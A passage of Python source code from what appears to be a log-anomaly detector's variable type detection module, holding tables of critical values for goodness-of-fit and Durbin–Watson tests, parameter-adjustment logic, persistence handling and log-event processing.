750: {'uni': 0.05469553492358907, 'beta1': 0.004833789083975562, 'beta2': 0.26489777149823035, 'beta4': [0.010722773184482691, 1.1960517300553821]}, 500: {'uni': 0.04775042790856262, 'beta1': 0.006652995919308116, 'beta2': 0.36021257322332423, 'beta4': [0.008695745069049706, 1.164928412055601]}, 400: {'uni': 0.057334009996901324, 'beta1': 0.004294613400485525, 'beta2': 0.371033028200585, 'beta4': [0.010031180328761704, 1.1501078191012866]}, 300: {'uni': 0.049684597811366665, 'beta1': 0.008499359150427318, 'beta2': 0.29613841935914803, 'beta4': [0.008837488922880181, 1.1231549228365025]}, 200: {'uni': 0.05832825272371185, 'beta1': 0.006697516279795657, 'beta2': 0.39511479851856224, 'beta4': [0.010047397962625848, 1.1181052008643884]}, 150: {'uni': 0.07777153033124701, 'beta1': 0.00900622480430151, 'beta2': 0.3840383315171673, 'beta4': [0.010868672609946542, 1.1055624437674316]}, 100: {'uni': 0.10446273882750046, 'beta1': 0.023086612022459412, 'beta2': 0.3554307967400825, 'beta4': [0.015850124282086046, 1.095887178493004]}, 75: {'uni': 0.1288379259227677, 'beta1': 0.03193365062395732, 'beta2': 0.41758773246133707, 'beta4': [0.019077099325128966, 1.0819065772828271]}, 50: {'uni': 0.20019589133880328, 'beta1': 0.05460579112418594, 'beta2': 0.4492824362223685, 'beta4': [0.03136538729573724, 1.0634108603370227]}, 30: {'uni': 0.2989964472722316, 'beta1': 0.10790396387551246, 'beta2': 0.518601566315402, 'beta4': [0.04157241281091631, 1.0527079106127977]}, 20: {'uni': 0.37471304310660425, 'beta1': 0.18583949748603418, 'beta2': 0.6021024278440756, 'beta4': [0.05749272265644228, 1.043381326439097]}, 10: {'uni': 0.527570467729745, 'beta1': 0.3603215508845803, 'beta2': 0.7131220771053172, 'beta4': [0.08533707841915919, 1.0350030516769588]}}, 150: {1000: {'uni': 0.07052889039205126, 'beta1': 0.010024200840333964, 'beta2': 0.3083261123837317, 'beta4': [0.013526285671768778, 1.2478637545541533]}, 750: {'uni': 0.0860726015615848, 'beta1': 0.010380529900627569, 'beta2': 0.30599740090325434, 'beta4': [0.012540685650418876, 1.2286531319506213]}, 500: {'uni': 0.0654006630277639, 'beta1': 0.008681664379906905, 'beta2': 0.45441420543986255, 'beta4': [0.011738965264343941, 1.2046107993328228]}, 400: {'uni': 0.07018607099380372, 'beta1': 0.020538750971438955, 'beta2': 0.3401951193202403, 'beta4': [0.010482953670016155, 1.1967410973771544]}, 300: {'uni': 0.07906994258517838, 'beta1': 0.012765196487756798, 'beta2': 0.3473319166630782, 'beta4': [0.012960970621760944, 1.186784276574822]}, 200: {'uni': 0.07687044506402128, 'beta1': 0.009009790251886841, 'beta2': 0.390321852263401, 'beta4': [0.016054629934173753, 1.1614077237409302]}, 150: {'uni': 0.08234029556315943, 'beta1': 0.014170771965552609, 'beta2': 0.32568694785066254, 'beta4': [0.011742895360485154, 1.1450709824504766]}, 100: {'uni': 0.09851302012310224, 'beta1': 0.016743774531242164, 'beta2': 0.3769412320128021, 'beta4': [0.01637186145008221, 1.1181403582578833]}, 75: {'uni': 0.13159671189369468, 'beta1': 0.0353072844153596, 'beta2': 0.4029701798442491, 'beta4': [0.0242920289946626, 1.1014964463557084]}, 50: {'uni': 0.2082524484431105, 'beta1': 0.058731656498910045, 'beta2': 0.4381324547033927, 'beta4': [0.026849081958434176, 1.0876033182011025]}, 30: {'uni': 0.293617651791125, 'beta1': 0.09264315880887661, 'beta2': 0.5127477095369036, 'beta4': [0.03992448279709234, 1.0738220472794529]}, 20: {'uni': 0.36087329714400185, 'beta1': 0.20900980183336224, 'beta2': 0.5807926264924211, 'beta4': [0.05187077347058253, 1.0620763444007149]}, 10: {'uni': 0.5219501641374265, 'beta1': 0.3551980104060056, 'beta2': 0.7076947393664232, 'beta4': [0.08767917650288747, 1.0483637472236114]}}, 100: {1000: {'uni': 0.09293632608491963, 'beta1': 0.025720520021528075, 'beta2': 0.40252090475367147, 'beta4': [0.020928371822775547, 1.34296320538308]}, 750: {'uni': 0.10604279254769028, 'beta1': 0.03092454484113119, 'beta2': 0.3818717550561334, 'beta4': [0.02453933202150238, 1.342042471316131]}, 500: {'uni': 0.12565818508622995, 'beta1': 0.022377522080934454, 'beta2': 0.3905279161507944, 'beta4': [0.019542928350261425, 1.3078129134604686]}, 400: {'uni': 0.10873296749252183, 'beta1': 0.021194077173698013, 'beta2': 0.40756034730854335, 'beta4': [0.02718956918208252, 1.2942385171370212]}, 300: {'uni': 0.15669346437026238, 'beta1': 0.03142712087537317, 'beta2': 0.43179943146892075, 'beta4': [0.02064917213006419, 1.2667039670988918]}, 200: {'uni': 0.13343635754779815, 'beta1': 0.024233682548692133, 'beta2': 0.41522565490064955, 'beta4': [0.022369515030967926, 1.229891305593201]}, 150: {'uni': 0.11102480689661139, 'beta1': 0.02156285575115978, 'beta2': 0.45645114687990723, 'beta4': [0.01753545868173576, 1.2201162525672415]}, 100: {'uni': 0.11113330260703609, 'beta1': 0.025608870599415502, 'beta2': 0.48352061272931374, 'beta4': [0.020850521302083376, 1.1960117094042504]}, 75: {'uni': 0.1468788764521182, 'beta1': 0.0265797908677119, 'beta2': 0.5095270313141985, 'beta4': [0.021404540631677776, 1.1660210148862071]}, 50: {'uni': 0.21504666655802165, 'beta1': 0.0489536361147554, 'beta2': 0.45594457855380627, 'beta4': [0.027095564600229022, 1.145224577518587]}, 30: {'uni': 0.28088203482754814, 'beta1': 0.10794487397895774, 'beta2': 0.5169455155470948, 'beta4': [0.042544039097420154, 1.1110310777960173]}, 20: {'uni': 0.3554362219541707, 'beta1': 0.14189026695845378, 'beta2': 0.5830537392316464, 'beta4': [0.056849867105273504, 1.0955705395949151]}, 10: {'uni': 0.5379842252559748, 'beta1': 0.3322804773023954, 'beta2': 0.6932018848300567, 'beta4': [0.08316172640718857, 1.0796082756736676]}}, 75: {1000: {'uni': 0.17532266769625532, 'beta1': 0.03705383020682054, 'beta2': 0.4980809003523, 'beta4': [0.026908987077822855, 1.479626079300446]}, 750: {'uni': 0.17675406910394137, 'beta1': 0.038950169506359156, 'beta2': 0.5358765381219652, 'beta4': [0.029789208608383192, 1.4458845611717743]}, 500: {'uni': 0.1745341229104289, 'beta1': 0.03502152451732104, 'beta2': 0.5015222005427495, 'beta4': [0.02661668897015479, 1.4148626116690979]}, 400: {'uni': 0.1881709766845352, 'beta1': 0.03266767818661956, 'beta2': 0.5294529369416701, 'beta4': [0.02895499025416707, 1.3854046773623654]}, 300: {'uni': 0.13841231000540105, 'beta1': 0.040099804822498177, 'beta2': 0.4996511962838116, 'beta4': [0.026756867634909184, 1.3802282341024599]}, 200: {'uni': 0.2366476167578417, 'beta1': 0.03552681627168437, 'beta2': 0.5607067863598236, 'beta4': [0.03323654149531536, 1.2735668785729228]}, 150: {'uni': 0.18246201015916463, 'beta1': 0.03018835273992427, 'beta2': 0.5001788380781702, 'beta4': [0.025060717431827743, 1.2546678580100472]}, 100: {'uni': 0.15047393862146116, 'beta1': 0.04053535855173776, 'beta2': 0.4812632826392785, 'beta4': [0.026154101723556197, 1.2327049090106668]}, 75: {'uni': 0.15012891413727075, 'beta1': 0.02909973108408468, 'beta2': 0.49374882961313393, 'beta4': [0.02312183625600833, 1.2116456107592724]}, 50: {'uni': 0.19863871412617307, 'beta1': 0.06609371552014234, 'beta2': 0.6567166295934954, 'beta4': [0.03296979599917632, 1.2550373634574192]}, 30: {'uni': 0.2550047584775841, 'beta1': 0.11172494481560213, 'beta2': 0.5074928992715775, 'beta4': [0.043521196438275414, 1.1350283218684674]}, 20: {'uni': 0.35838253867057834, 'beta1': 0.16187358221610643, 'beta2': 0.5897253293496353, 'beta4': [0.05534786787218656, 1.1279915725089584]}, 10: {'uni': 0.5150122800236072, 'beta1': 0.3557051324372316, 'beta2': 0.6880298753534303, 'beta4': [0.09054643254841971, 1.103946091144453]}}, 50: {1000: {'uni': 0.2650056267046456, 'beta1': 0.08166412797304853, 'beta2': 0.5945214491866839, 'beta4': [0.04097953842977647, 1.8013173549302084]}, 750: {'uni': 0.24155189502911895, 'beta1': 0.10245354397196359, 'beta2': 0.6330919397034261, 'beta4': [0.034894476175374486, 1.650125217907123]}, 500: {'uni': 0.22696308147232963, 'beta1': 0.0679737190879648, 'beta2': 0.6138878557879524, 'beta4': [0.03566096720674545, 1.6223000589486727]}, 400: {'uni': 0.33396981679697424, 'beta1': 0.0706793112232333, 'beta2': 0.7113457702884565, 'beta4': [0.03723609953854181, 1.515912197850878]}, 300: {'uni': 0.2294437752492345, 'beta1': 0.10300859222087975, 'beta2': 0.624203244880632, 'beta4': [0.03555120916901846, 1.4723487637131012]}, 200: {'uni': 0.23606764222426072, 'beta1': 0.0596235427426007, 'beta2': 0.6485710881348021, 'beta4': [0.03546895329039058, 1.4690637171977303]}, 150: {'uni': 0.24971083019799395, 'beta1': 0.08173419251816907, 'beta2': 0.6412527594047174, 'beta4': [0.03080052698601413, 1.400646947726267]}, 100: {'uni': 0.24073055018989464, 'beta1': 0.08393118651040495, 'beta2': 0.6318891921522501, 'beta4': [0.033365155212361386, 1.3928918785590392]}, 75: {'uni': 0.20486837629924928, 'beta1': 0.07832186899428449, 'beta2': 0.9281761107775478, 'beta4': [0.035445164112972466, 1.359740664152222]}, 50: {'uni': 0.31302104786432344, 'beta1': 0.06958866399568142, 'beta2': 0.6675066174467515, 'beta4': [0.04004874980800829, 1.3013016016398449]}, 30: {'uni': 0.3000620157287262, 'beta1': 0.10185267251225222, 'beta2': 0.5982970610321356, 'beta4': [0.04582850492651095, 1.2269146691004775]}, 20: {'uni': 0.3277234906176977, 'beta1': 0.17678051119760746, 'beta2': 0.80877510160582, 'beta4': [0.055374219831087326, 1.182345614556768]}, 10: {'uni': 0.5486887840452432, 'beta1': 0.33752085706590534, 'beta2': 0.9783712560936997, 'beta4': [0.08769564811462487, 1.1728320174796847]}}, 30: {1000: {'uni': 0.4718938205689787, 'beta1': 0.16850220491415746, 'beta2': 0.8146723863376911, 'beta4': [0.060273300232967286, 2.0988712699699263]}, 750: {'uni': 0.5018440993649246, 'beta1': 0.17087313652020972, 'beta2': 0.9139854538013207, 'beta4': [0.06558390958546415, 1.9685729528057976]}, 500: {'uni': 0.4550074651154489, 'beta1': 0.28720847796868054, 'beta2': 0.9452586563341621, 'beta4': [0.05890745674834778, 1.8754248251081465]}, 400: {'uni': 0.436712873445179, 'beta1': 0.19309724802712522, 'beta2': 0.8305072281593623, 'beta4': [0.07639496690376428, 1.8192427800816744]}, 300: {'uni': 0.4038782023707537, 'beta1': 0.21954095996677023, 'beta2': 1.0495495612649217, 'beta4': [0.086287115068548, 1.8253687511907974]}, 200: {'uni': 0.40958440685368225, 'beta1': 0.2777249767350044, 'beta2': 0.8707654031176021, 'beta4': [0.05316017846802162, 1.9337123485717123]}, 150: {'uni': 0.48726972984551553, 'beta1': 0.2808145117204757, 'beta2': 0.7712993996707392, 'beta4': [0.06855307088907785, 1.6668462866585527]}, 100: {'uni': 0.4200145205606179, 'beta1': 0.2606601028231352, 'beta2': 0.9232966743931794, 'beta4': [0.05814323640662995, 1.6078579676603513]}, 75: {'uni': 0.39519545172731607, 'beta1': 0.22617403736893438, 'beta2': 0.890799391826426, 'beta4': [0.054127227539886885, 1.560768803789716]}, 50: {'uni': 0.39025281852797566, 'beta1': 0.23363888472905656, 'beta2': 1.2303662537657782, 'beta4': [0.06300398028876605, 1.4559351506605223]}, 30: {'uni': 0.44358611593337394, 'beta1': 0.26124311609935197, 'beta2': 0.9784487439751727, 'beta4': [0.06612661331709933, 1.392222289383322]}, 20: {'uni': 0.5347291476681059, 'beta1': 0.27747940739842103, 'beta2': 0.9266746270833626, 'beta4': [0.06610539815659515, 1.32312648428402]}, 10: {'uni': 0.5268518049779942, 'beta1': 0.3857529731825581, 'beta2': 1.1001485562440783, 'beta4': [0.08788647848700928, 1.2844856774978703]}}, 20: {1000: {'uni': 0.611616820756745, 'beta1': 0.6103466151158652, 'beta2': 1.606833963804752, 'beta4': [0.09884033613550786, 2.1456400777366262]}, 750: {'uni': 0.8441808990110113, 'beta1': 0.655796713372086, 'beta2': 1.3506490733719665, 'beta4': [0.08853624853950347, 2.43866677610598]}, 500: {'uni': 0.5988373577646251, 'beta1': 0.46186085630032825, 'beta2': 1.1443828909845946, 'beta4': [0.0898461305276427, 2.2698199759166293]}, 400: {'uni': 0.8304510322484031, 'beta1': 0.5653414175451948, 'beta2': 1.0996186027703847, 'beta4': [0.08571539158958671, 3.387955591663139]}, 300: {'uni': 0.7442187522594172, 'beta1': 0.46331401253974935, 'beta2': 1.3717790709655808, 'beta4': [0.08555870911414092, 2.2166475986530325]}, 200: {'uni': 0.5840315022363041, 'beta1': 0.500364751905612, 'beta2': 1.4769988218033934, 'beta4': [0.08329354644891862, 2.1254438240050932]}, 150: {'uni': 0.7370906650368898, 'beta1': 0.4300463168971484, 'beta2': 1.3485978764788007, 'beta4': [0.09303457801455614, 2.2267612097524974]}, 100: {'uni': 0.6956826951091755, 'beta1': 0.5470576578153282, 'beta2': 1.2950746340437869, 'beta4': [0.085475813042166, 2.138973908107944]}, 75: {'uni': 0.6315552620464701, 'beta1': 0.45366873570471705, 'beta2': 1.1868079151662958, 'beta4': [0.08610644280569565, 2.003073434601368]}, 50: {'uni': 0.7697854387023668, 'beta1': 0.6507738597857059, 'beta2': 1.2659839239789354, 'beta4': [0.1046390254645072, 1.8724398846396764]}, 30: {'uni': 0.6306465749354568, 'beta1': 0.3466779009755018, 'beta2': 1.4822578201869108, 'beta4': [0.07745622301179714, 1.657048978669253]}, 20: {'uni': 0.8379018121518431, 'beta1': 0.4723776520325354, 'beta2': 1.2850268089384693, 'beta4': [0.08284590089109896, 1.6388492255583167]}, 10: {'uni': 0.8026106812614728, 'beta1': 0.8119190556003473, 'beta2': 1.2439818501783644, 'beta4': [0.085265760399476, 1.5405846754306889]}}, 10: {1000: {'uni': 2.3606969805461206, 'beta1': 8.291393251934911, 'beta2': 3.0820553912299253, 'beta4': [0.17737760558981158, 4.722276247639879]}, 750: {'uni': 2.6243276289156463, 'beta1': 2.7438030102193163, 'beta2': 3.9683799500049672, 'beta4': [0.17895578288402622, 4.083319167546689]}, 500: {'uni': 3.0871922423026548, 'beta1': 3.0328915004201407, 'beta2': 2.4964791662617336, 'beta4': [0.18355309506899545, 4.031756561717203]}, 400: {'uni': 1.6754252980305366, 'beta1': 2.924592003149563, 'beta2': 2.876497968109593, 'beta4': [0.20379870214850968, 4.7571034917708745]}, 300: {'uni': 2.2840468336952258, 'beta1': 2.5053743801906627, 'beta2': 2.783976562174647, 'beta4': [0.1674565791702932, 4.251642426694717]}, 200: {'uni': 1.9404428681304904, 'beta1': 2.5953221685871517, 'beta2': 2.7845173800545835, 'beta4': [0.18871911293484883, 3.741857968949452]}, 150: {'uni': 2.2704248546155794, 'beta1': 2.5329844830991, 'beta2': 2.9321247060942506, 'beta4': [0.19544767471408223, 4.336291651767806]}, 100: {'uni': 1.7356265048063002, 'beta1': 2.688039772684837, 'beta2': 4.461312176712382, 'beta4': [0.2144202268455395, 3.7766159615531025]}, 75: {'uni': 2.801004734921743, 'beta1': 2.464893798760152, 'beta2': 3.0067071540322545, 'beta4': [0.15188724806910345, 3.526991789646563]}, 50: {'uni': 2.0977009172862875, 'beta1': 2.7445624040074015, 'beta2': 2.765481175145812, 'beta4': [0.18755095945550393, 3.344866076834204]}, 30: {'uni': 2.880255284937104, 'beta1': 3.0321147833640745, 'beta2': 2.8449557765079883, 'beta4': [0.17623333533835164, 2.790174609633874]}, 20: {'uni': 1.9749893632036886, 'beta1': 2.776680410526643, 'beta2': 2.333479763453262, 'beta4': [0.17125301578097318, 2.713705409440226]}, 10: {'uni': 1.769735529651201, 'beta1': 2.0654589693702543, 'beta2': 2.084703780638172, 'beta4': [0.1690462952550446, 2.275840335334111]}}}} # skipcq: FLK-E231, FLK-E501 # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' in the initialization and # the samplesize 'num_s_gof_values' in the update steps for the CM-homogeneity test self.crit_val_hom_cm = {0.05: {1000: {1000: 250.45790499999998, 750: 214.76505847619046, 500: 167.13765355555554, 400: 143.34140714285715, 300: 115.84368512820512, 200: 83.78856944444445, 150: 65.64008811594204, 100: 45.92995272727273, 75: 35.333255503875975, 50: 24.20186603174603, 30: 15.071306472491909, 20: 10.300656209150326, 10: 5.412521782178217}, 750: {750: 187.94798666666668, 500: 150.45562666666666, 400: 130.8715215942029, 300: 107.59431746031746, 200: 79.42039298245614, 150: 62.92309481481481, 100: 44.59799294117647, 75: 34.55483636363636, 50: 23.878958333333333, 30: 14.859858119658119, 20: 10.21919393939394, 10: 5.402328070175439}, 500: {500: 125.503068, 400: 111.5444314814815, 300: 94.26128, 200: 71.8865042857143, 150: 58.17430564102565, 100: 42.119102222222224, 75: 33.121080579710146, 50: 23.146869090909092, 30: 14.620633962264153, 20: 10.067361538461538, 10: 5.362602614379085}, 400: {400: 100.46720625, 300: 86.17663333333333, 200: 67.12748888888889, 150: 55.01036818181819, 100: 40.436935, 75: 32.00267719298246, 50: 22.691451851851852, 30: 14.409891472868217, 20: 9.963246031746031, 10: 5.314048780487806}, 300: {300: 75.4713888888889, 200: 60.46678, 150: 50.42997037037037, 100: 37.9633, 75: 30.453804444444447, 50: 21.899904761904764, 30: 14.075888888888887, 20: 9.838104166666666, 10: 5.271225806451613}, 200: {200: 50.458725, 150: 43.26386190476191, 100: 33.81099444444445, 75: 27.704703030303033, 50: 20.47892, 30: 13.505202898550726, 20: 9.538204545454546, 10: 5.192849206349207}, 150: {150: 37.93966666666667, 100: 30.43725333333333, 75: 25.45431111111111, 50: 19.195833333333333, 30: 12.965740740740742, 20: 9.288392156862745, 10: 5.1022083333333335}, 100: {100: 25.4654, 75: 21.866933333333332, 50: 17.144955555555555, 30: 12.011923076923077, 20: 8.791944444444445, 10: 5.000454545454545}, 75: {75: 19.179288888888887, 50: 15.485066666666667, 30: 11.208, 20: 8.371368421052633, 10: 4.864470588235294}, 50: {50: 13.005400000000002, 30: 9.881416666666667, 20: 7.576285714285715, 10: 4.6065555555555555}, 30: {30: 7.982777777777779, 20: 6.457666666666666, 10: 4.179166666666666}, 20: {20: 5.442500000000001, 10: 3.7661111111111114}, 10: {10: 2.925}}} # skipcq: FLK-E231, FLK-E501 # List of the critical values of the durbin watson test self.crit_val_dw = {0.01: {1000: 1.855, 750: 1.833, 500: 1.797, 400: 1.773, 300: 1.739, 200: 1.684, 150: 1.637, 100: 1.562, 75: 1.501, 50: 1.403, 30: 1.264, 20: 1.147, 10: 1.001}, # skipcq: FLK-E501 0.05: {1000: 1.898, 750: 1.883, 500: 1.857, 400: 1.841, 300: 1.817, 200: 1.779, 150: 1.747, 100: 1.694, 75: 1.652, 50: 1.585, 30: 1.489, 20: 1.411, 10: 1.320}} # skipcq: FLK-E501 if self.dw_alpha not in self.crit_val_dw: pos_vals = list(self.crit_val_dw.keys()) nearest = self.crit_val_dw[0] for val in self.crit_val_dw[1:]: if abs(self.dw_alpha - val) < abs(self.dw_alpha - nearest): nearest = val msg = f'Changed the parameter dw_alpha of the VTD from {self.dw_alpha} to {nearest} to use the pregenerated critical values ' \ f'for the dw-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.dw_alpha = nearest if num_init not in self.crit_val_dw[self.dw_alpha]: pos_vals = list(self.crit_val_dw[self.dw_alpha].keys()) nearest = pos_vals[0] for val in pos_vals[1:]: if abs(num_init - val) < abs(num_init - nearest): nearest = val msg = f'Changed the parameter num_init of the VTD from {num_init} to {nearest} to use the pregenerated critical values for ' \ f'the dw-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.num_init = nearest if (self.used_gof_test == 'KS' and (gof_alpha not in self.crit_val_ini_ks or gof_alpha not in self.crit_val_upd_ks)) or ( self.used_gof_test == 'CM' and (gof_alpha not in self.crit_val_ini_cm or gof_alpha not in self.crit_val_upd_cm or gof_alpha not in self.crit_val_hom_cm)): if self.used_gof_test == 'KS': pos_vals = [val for val in self.crit_val_ini_ks if val in self.crit_val_upd_ks] else: pos_vals = [val for val in self.crit_val_ini_cm if val in self.crit_val_upd_cm and val in self.crit_val_hom_cm] nearest = pos_vals[0] for val in pos_vals[1:]: if abs(self.gof_alpha - val) < abs(self.gof_alpha - nearest): nearest = val msg = f'Changed the parameter gof_alpha of the VTD from {self.gof_alpha} to {nearest} to use the pregenerated critical ' \ f'values for the gof-tests' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.gof_alpha = nearest if (self.used_gof_test == 'KS' and (num_init not in self.crit_val_ini_ks[self.gof_alpha] or num_init not in self.crit_val_upd_ks[self.gof_alpha])) or ( self.used_gof_test == 'CM' and (num_init not in self.crit_val_ini_cm[self.gof_alpha] or num_init not in self.crit_val_upd_cm[self.gof_alpha] or num_init not in self.crit_val_hom_cm[self.gof_alpha])): if self.used_gof_test == 'KS': pos_vals = [val for val in self.crit_val_ini_ks[self.gof_alpha] if val in self.crit_val_upd_ks[self.gof_alpha]] else: pos_vals = [val for val in self.crit_val_ini_cm[self.gof_alpha] if val in self.crit_val_upd_cm[self.gof_alpha] and val in self.crit_val_hom_cm[self.gof_alpha]] nearest = pos_vals[0] for val in pos_vals[1:]: if abs(num_init - val) < abs(num_init - nearest): nearest = val msg = f'Changed the parameter num_init of the VTD from {num_init} to {nearest} to use the pregenerated critical values for' \ f' the gof-tests' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.num_init = nearest if (self.used_gof_test == 'KS' and (num_s_gof_values not in self.crit_val_upd_ks[self.gof_alpha][self.num_init])) or ( self.used_gof_test == 'CM' and (num_s_gof_values not in self.crit_val_upd_cm[self.gof_alpha][self.num_init] or num_s_gof_values not in self.crit_val_hom_cm[self.gof_alpha][self.num_init])): if self.used_gof_test == 'KS': pos_vals = list(self.crit_val_upd_ks[self.gof_alpha][self.num_init].keys()) else: pos_vals = [val for val in self.crit_val_upd_cm[self.gof_alpha][self.num_init] if val in self.crit_val_hom_cm[self.gof_alpha][self.num_init]] nearest = pos_vals[0] for val in pos_vals[1:]: if abs(num_s_gof_values - val) < abs(num_s_gof_values - nearest): nearest = val msg = f'Changed the parameter num_s_gof_values of the VTD from {num_s_gof_values} to {nearest} to use pregenerated ' \ f'critical values for the gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.num_s_gof_values = nearest # Test if the ETD saves the values if not self.event_type_detector.save_values: msg = 'Changed the parameter save_values of the VTD from False to True to properly use the PathArimaDetector' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.save_values = True # Test if the ETD saves enough values if self.event_type_detector.min_num_vals < max(self.num_init, self.num_update, self.num_s_gof_values): msg = f'Changed the parameter min_num_vals of the ETD from {self.event_type_detector.min_num_vals} to ' \ f'{max(self.num_init, self.num_update, num_s_gof_values)} to use pregenerated critical values for the VTDs gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.min_num_vals = max(self.num_init, self.num_update, self.num_s_gof_values) # Test if the ETD saves enough values if self.event_type_detector.max_num_vals < max(self.num_init, self.num_update, self.num_s_gof_values) + 500: msg = f'Changed the parameter max_num_vals of the ETD from {self.event_type_detector.max_num_vals} to ' \ f'{max(self.num_init, self.num_update, self.num_s_gof_values) + 500} to use pregenerated critical values for the VTDs' \ f' gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.max_num_vals = max(self.num_init, self.num_update, self.num_s_gof_values) + 500 # Loads the persistence self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) # Imports the persistence if persistence_data is not None: self.load_persistence_data(persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug('%s loaded persistence data.', self.__class__.__name__) # Generate the modifiers for the estimation of the minimum and maximum for the uniform distribution self.min_mod_ini_uni = 1 / (self.num_init + 1) self.min_mod_upd_uni = 1 / (self.num_init + self.num_update + 1) self.max_mod_ini_uni = 1 / (self.num_init + 1) self.max_mod_upd_uni = 1 / (self.num_init + self.num_update + 1) # Generate the modifiers for the estimation of the minimum and maximum for the beta1 distribution self.min_mod_ini_beta1 = self.quantiles['beta1'][max(0.001, int(1 / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.min_mod_upd_beta1 = self.quantiles['beta1'][max(0.001, int(1 / (self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] self.max_mod_ini_beta1 = 1 - self.quantiles['beta1'][min(0.999, int(self.num_init / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.max_mod_upd_beta1 = 1 - self.quantiles['beta1'][min(0.999, int((self.num_init + self.num_update) / ( self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] # Generate the modifiers for the estimation of the minimum and maximum for the beta2 distribution self.min_mod_ini_beta2 = self.quantiles['beta2'][max(0.001, int(1 / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.min_mod_upd_beta2 = self.quantiles['beta2'][max(0.001, int(1 / (self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] self.max_mod_ini_beta2 = 1-self.quantiles['beta2'][min(0.999, int(self.num_init / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.max_mod_upd_beta2 = 1-self.quantiles['beta2'][min(0.999, int((self.num_init + self.num_update) / ( self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] # Generate the modifiers for the estimation of the minimum and maximum for the beta4 distribution self.min_mod_ini_beta4 = self.quantiles['beta4'][max(0.001, int(1 / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.min_mod_upd_beta4 = self.quantiles['beta4'][max(0.001, int(1 / (self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] self.max_mod_ini_beta4 = 1-self.quantiles['beta4'][min(0.999, int(self.num_init / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.max_mod_upd_beta4 = 1-self.quantiles['beta4'][min(0.999, int((self.num_init + self.num_update) / ( self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] def receive_atom(self, log_atom): """ Receive an parsed atom and the information about the parser match. Initializes Variables for new eventTypes. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. """ event_index = self.event_type_detector.current_index if event_index == -1: return False if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False self.log_total += 1 parser_match = log_atom.parser_match # Skip paths from ignore_list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False if self.target_path_list is None or len(self.target_path_list) == 0: constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False # Initialize new entries in lists for a new eventType if necessary if len(self.length) < event_index + 1 or self.var_type[event_index] == []: for _ in range(event_index + 1 - len(self.length)): self.length.append(0) self.variable_path_num.append([]) self.var_type.append([]) self.alternative_distribution_types.append([]) self.distr_val.append([]) self.bt_results.append([]) # Number of variables self.length[event_index] = len(self.event_type_detector.variable_key_list[event_index]) # List of the found vartypes self.var_type[event_index] = [[] for i in range(self.length[event_index])] # Stores the alternative distributions of the variable self.alternative_distribution_types[event_index] = [[] for i in range(self.length[event_index])] # Stores the values the distribution, which are needed for the s_gof self.distr_val[event_index] = [[] for i in range(self.length[event_index])] # List of the successes of the binomial test for the rejection in the s_gof or variables of discrete type self.bt_results[event_index] = [[] for i in range(self.length[event_index])] # Adds the variable indices to the variable_path_num-list if the target_path_list is not empty if self.target_path_list is not None: for var_index in range(self.length[event_index]): if self.event_type_detector.variable_key_list[event_index][var_index] in self.target_path_list: self.variable_path_num[event_index].append(var_index) if self.num_events < event_index + 1: self.num_events = event_index + 1 # Processes the current log-line by testing and updating self.process_ll(event_index, log_atom) return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" tmp_list = [self.var_type, self.alternative_distribution_types, self.var_type_history_list, self.var_type_history_list_reference, self.failed_indicators, [[self.distr_val[event_index][var_index] if ( len(self.distr_val[event_index][var_index]) > 0 and self.var_type[event_index][var_index][0] == 'emp') else [] for var_index in range(len(self.distr_val[event_index]))] for event_index in range(len(self.distr_val))]] PersistenceUtil.store_json(self.persistence_file_name, tmp_list) if self.save_statistics: PersistenceUtil.store_json(self.statistics_file_name, [ self.failed_indicators_total, self.failed_indicators_values, self.failed_indicators_paths, self.failed_indicators]) logging.getLogger(DEBUG_LOG_NAME).debug('%s persisted data.', self.__class__.__name__) def load_persistence_data(self, persistence_data): """Extract the persistence data and appends various lists to create a consistent state.""" # Import the lists of the persistence self.var_type = persistence_data[0] self.alternative_distribution_types = persistence_data[1] self.var_type_history_list = persistence_data[2] self.var_type_history_list_reference = persistence_data[3] self.failed_indicators = persistence_data[4] self.distr_val = persistence_data[5] self.num_events = 